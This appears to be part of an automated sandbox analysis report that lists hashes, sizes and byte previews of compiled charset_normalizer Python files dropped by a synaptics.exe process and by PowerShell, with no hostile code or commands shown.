                                                                                                                                                                                                            Preview:o..........gW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1579
                                                                                                                                                                                                            Entropy (8bit):5.723146470400134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:04jbqjQtyat/c2vhCMhju/C/yv+K7qeUy:0WbqjQttwZ/C/yvvWeUy
                                                                                                                                                                                                            MD5:ADE62DABE3C84066BE5802D0BF7E0B24
                                                                                                                                                                                                            SHA1:C436F12D8879D9AE6DA3F4D31DD672267D35005B
                                                                                                                                                                                                            SHA-256:388B4976950E9EA84581CE83CB16DEDE552773FD8ABB39E1F55F5F17B6374211
                                                                                                                                                                                                            SHA-512:C726CF4F31A3F1417ACA87A535513F3C27049595B29167CE2758EDDCC2A8EEE584004F6C9D28159E0C8FFB816679A716CCE1EF577D6C47892F72DC308EE76C71
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):289
                                                                                                                                                                                                            Entropy (8bit):5.041659677875826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/CoCeYra/qlPQv/L95/n23d6xUArsQx6GC84:CSeYra/qC//2IOQ8GC84
                                                                                                                                                                                                            MD5:F0E8582DB4DA1827475298BB72840AEB
                                                                                                                                                                                                            SHA1:1C0F8B1CD20BD311AE7F50507EEDCCD7F119BF84
                                                                                                                                                                                                            SHA-256:5079FC2E1837120CEB1BDD1EADA03C0C536289EB1174B7349C43D1308B1D6D52
                                                                                                                                                                                                            SHA-512:96102C716D087ADA08BB70D7BA166F7D6BD318AE7429DE57DF730184F05748B7DCE75E5951AEB4A4CBC61D8A74D775C910CF9D53265CF0190672B7A65D2C6B42
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gM........................@...s"...d.d.l.m.Z...e.d.k.r.e.....d.S.d.S.)......)...cli_detect..__main__N)...clir......__name__..r....r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\charset_normalizer/__main__.py..<module>....s............
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11683
                                                                                                                                                                                                            Entropy (8bit):5.834564594121132
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:FWeJLv8V6fy4TM8eIGOD5vUD3MHz9ZZERzOBJzCTrFmYAr6aYohA0LfAgWSK57QI:FWeJLvc0TM8N630ZZaUzCvvm6GhA0Lfi
                                                                                                                                                                                                            MD5:874FED8736492B39C53DDB61A5351A07
                                                                                                                                                                                                            SHA1:D9B4BAE165753D7525C292702AD9AE7EBBA0387E
                                                                                                                                                                                                            SHA-256:6A48B2E0F41B1A4E212F8116C2D090FEF3E73E34F18F12CAA3132895BA842CD0
                                                                                                                                                                                                            SHA-512:E3AA71EEDA9448FA704BF64ED06701E5E007EF356D7CA6A3268C9ACBED163C4258629D668A6192266F064AEFAD364465191EE872804556058E6480CACD53FA97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Z.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11708
                                                                                                                                                                                                            Entropy (8bit):5.8400460631249524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:IWeJLv8V6fy4TM8eIGOD5vUD3MHz9ZZERkOBJzCTrFmYAr6aYohA0LfAgWSK57QI:IWeJLvc0TM8N630ZZa9zCvvm6GhA0Lfi
                                                                                                                                                                                                            MD5:C76166A72524F5D818AF73998AFF67D7
                                                                                                                                                                                                            SHA1:C6D6E6AB11614BC20A81E27F3EDE324C5DF3459C
                                                                                                                                                                                                            SHA-256:1FC59A7D464117E01363C9C53A1DECABA0BAEA71398F1487AB8958C76B1953D6
                                                                                                                                                                                                            SHA-512:B55CB0ABA32514DEE08875C88F96F8A309C7E58960CD52C558CCEE9B22B04645FEA826A71EDF09EFE2070546AA924C3EA505E0D2B1DFD8D0D266E54CD4588D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Z.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11708
                                                                                                                                                                                                            Entropy (8bit):5.8400460631249524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:IWeJLv8V6fy4TM8eIGOD5vUD3MHz9ZZERkOBJzCTrFmYAr6aYohA0LfAgWSK57QI:IWeJLvc0TM8N630ZZa9zCvvm6GhA0Lfi
                                                                                                                                                                                                            MD5:C76166A72524F5D818AF73998AFF67D7
                                                                                                                                                                                                            SHA1:C6D6E6AB11614BC20A81E27F3EDE324C5DF3459C
                                                                                                                                                                                                            SHA-256:1FC59A7D464117E01363C9C53A1DECABA0BAEA71398F1487AB8958C76B1953D6
                                                                                                                                                                                                            SHA-512:B55CB0ABA32514DEE08875C88F96F8A309C7E58960CD52C558CCEE9B22B04645FEA826A71EDF09EFE2070546AA924C3EA505E0D2B1DFD8D0D266E54CD4588D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Z.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9632
                                                                                                                                                                                                            Entropy (8bit):5.510616821835345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dq5oeApoIRl8if8gZ+hjj2mspqjrOBTLpPc7nSgGKO56ytTatX79w/kfTYY:Q5QTf8g5mymOBT9Pc7nLGKO56yQt7e/G
                                                                                                                                                                                                            MD5:B8097CAF08575E618B6337C36735CBD2
                                                                                                                                                                                                            SHA1:C3E9BF958F1E00B82C54D3972A6FF83B6861C4E1
                                                                                                                                                                                                            SHA-256:8D5A39D32CE9FC868DCE72D804B51C1974927D8B843A54AC177445D06CA6037F
                                                                                                                                                                                                            SHA-512:83C5C54B455AD5685A9394D10A9092BF7A4AE424FBE7D2DE453DB2C1EBCD351AFD1AC151915F6A8286F900138B388C91C00EEB954D3F8FFCC4FBA7953931139F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9657
                                                                                                                                                                                                            Entropy (8bit):5.517992906256985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:+q53eApoIRl8if8rZ+IjfsmspqbQO0opPc7HPM4pOfXntTatDlA5u4ZBTWm:B57Tf8rkmypO0iPc7Hk4pOfXnQJlYuOB
                                                                                                                                                                                                            MD5:62009F5C08C73FB14418EFA0DA9508B2
                                                                                                                                                                                                            SHA1:5E958735319E38A8067FD71F2951A9D855F4600B
                                                                                                                                                                                                            SHA-256:8D1B10E86D9F81EB7CEC527B0B0A8E8403A7925B8157025AF3BDB3228F1DEE9A
                                                                                                                                                                                                            SHA-512:28B8212FCDFA88734F91BCA703165F0590CC10404A412BE78DA25A6D479A6B55F180E607D10E8830366FF348F785F38DF5CD2114F062FD6311C0CE64BF7A9F3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30426
                                                                                                                                                                                                            Entropy (8bit):5.887696574447018
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:kvZKN0taqbKcwF7wuCDZ8OHp2doD9VwypcDGVE6db45ufzR7C:kvZ6EKcR7SsHDkypjU5uft7C
                                                                                                                                                                                                            MD5:7B9618EC48E45A5549886D8FA0F35DB2
                                                                                                                                                                                                            SHA1:B25A3C471D69770AA684DC3E0FB9FCD49FA8D9B9
                                                                                                                                                                                                            SHA-256:5A2AFB8A3B12287F8E173EE2A74425190E1EAE4D034BF7D227EA5CCF2DB8BA84
                                                                                                                                                                                                            SHA-512:FE52EBAD7F3C2431EC0AFB18ADD66E16FF509191AA8C4B4AED316FF9D164B9C58396C408FD4FCA5C37A3E040F963EB4953C9B5081DB9F839A2F412D46878CDF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30451
                                                                                                                                                                                                            Entropy (8bit):5.889725126383976
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:RvZKN0taqbKcwF7wuCDa14SHp2doD9VwypcDGVE6db45ufzR7C:RvZ6EKcR7GqwHDkypjU5uft7C
                                                                                                                                                                                                            MD5:8B67169E0CE25639B9E40136C449BB51
                                                                                                                                                                                                            SHA1:47EDEAEC02C193F723F3E2E4CA70E6B7CE72EB17
                                                                                                                                                                                                            SHA-256:00E959888789101E7DCEDEE30700BE2AF55B00E8A7FC8F74BFCF6A61DC980EB9
                                                                                                                                                                                                            SHA-512:50248A06F1BD61D3AB7A77F00A40C5E5023DA9ED672559D50003C9D1A9E61B7862CF00DED6F521C7C0288DA9C9E66ED4605484AD934558078FEA1093302B3A04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30451
                                                                                                                                                                                                            Entropy (8bit):5.889725126383976
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:RvZKN0taqbKcwF7wuCDYAqHp2doD9VwypcDGVE6db45ufzR7C:RvZ6EKcR77YHDkypjU5uft7C
                                                                                                                                                                                                            MD5:DD126FF06A710456B92BEDC7191F3893
                                                                                                                                                                                                            SHA1:C9E94798A5FAEB60D161087A9286A121892B3068
                                                                                                                                                                                                            SHA-256:F5AA2B28A83B9FCF5E6FAC07B072D03B796018F70E266D95322E7F252A1F0E4E
                                                                                                                                                                                                            SHA-512:7528E64086CF5C98CDBB1FD5AF5EB50D05A1620EFFD75CF105ED2D98749FE1CE3F1C6E12866A12E07A674D21A16DCACE297F2BF3E04905EC7BFAA13C7798EEAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2159
                                                                                                                                                                                                            Entropy (8bit):5.471480403617667
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:00eE81+CoeEW5bebSh3Ue75yubxlhhLVbIf7IqJ:zG1geEW5bebSyo5ycPzVETJ
                                                                                                                                                                                                            MD5:1C514110283A8F28CF62F74C40C2AE6D
                                                                                                                                                                                                            SHA1:4E0D695DB889AAC98D3C1092667B4E0E2765230B
                                                                                                                                                                                                            SHA-256:9F58E133AE5AC4D48940767185A50AD0FF5A88847D742DFE1C18D316810CF963
                                                                                                                                                                                                            SHA-512:F43FE02D4EA6EAAC1B69A64B5F5E4522FAA365D54270FCEBBF15C8C13471E4FFEC0CCB2B61E8EE4A02BD993215BA8C3819D9F21D37587A0419F7A2F2512785CA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gX........................@...sv...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r2d.d.l.m.Z...G.d.d...d.e...Z...d.d.d.d...Z.d.S.)......)...annotations)...TYPE_CHECKING..Any..Optional)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCE)...TypedDictc....................@...s&...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ResultDictz.Optional[str]..encoding..str..languagez.Optional[float]..confidenceN)...__name__..__module__..__qualname__..__annotations__..r....r.....=C:\WinExplorer\lib\site-packages\charset_normalizer\legacy.pyr........s............r....F..byte_str..bytes..should_rename_legacy..bool..kwargsr......returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2184
                                                                                                                                                                                                            Entropy (8bit):5.499247500077533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:aeE81+CiqeEW5bebSh3Ue75yubxlhhLVbIf7IqJ:aG1PeEW5bebSyo5ycPzVETJ
                                                                                                                                                                                                            MD5:F2F9A3B604C330177EFC5FCCE04F9A08
                                                                                                                                                                                                            SHA1:A80372A5884DF169380881573D79491BDBC60346
                                                                                                                                                                                                            SHA-256:DBE0A36AE4924684AD27C2008651E8DE483BD22FEA2EFAC7D767B3B1D142BB0B
                                                                                                                                                                                                            SHA-512:D506CF13AB402446A39AB70B225291FCBBE2D993F5B96067D8935F85867034732AFF9A52F51DF3F3800B31B1753C8FA85EB078A180EF86CB728EB56D4B3F2C69
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gX........................@...sv...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r2d.d.l.m.Z...G.d.d...d.e...Z...d.d.d.d...Z.d.S.)......)...annotations)...TYPE_CHECKING..Any..Optional)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCE)...TypedDictc....................@...s&...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ResultDictz.Optional[str]..encoding..str..languagez.Optional[float]..confidenceN)...__name__..__module__..__qualname__..__annotations__..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\charset_normalizer\legacy.pyr........s............r....F..byte_str..bytes..should_rename_legacy..bool..kwargsr......returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the en
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15964
                                                                                                                                                                                                            Entropy (8bit):5.106601679646484
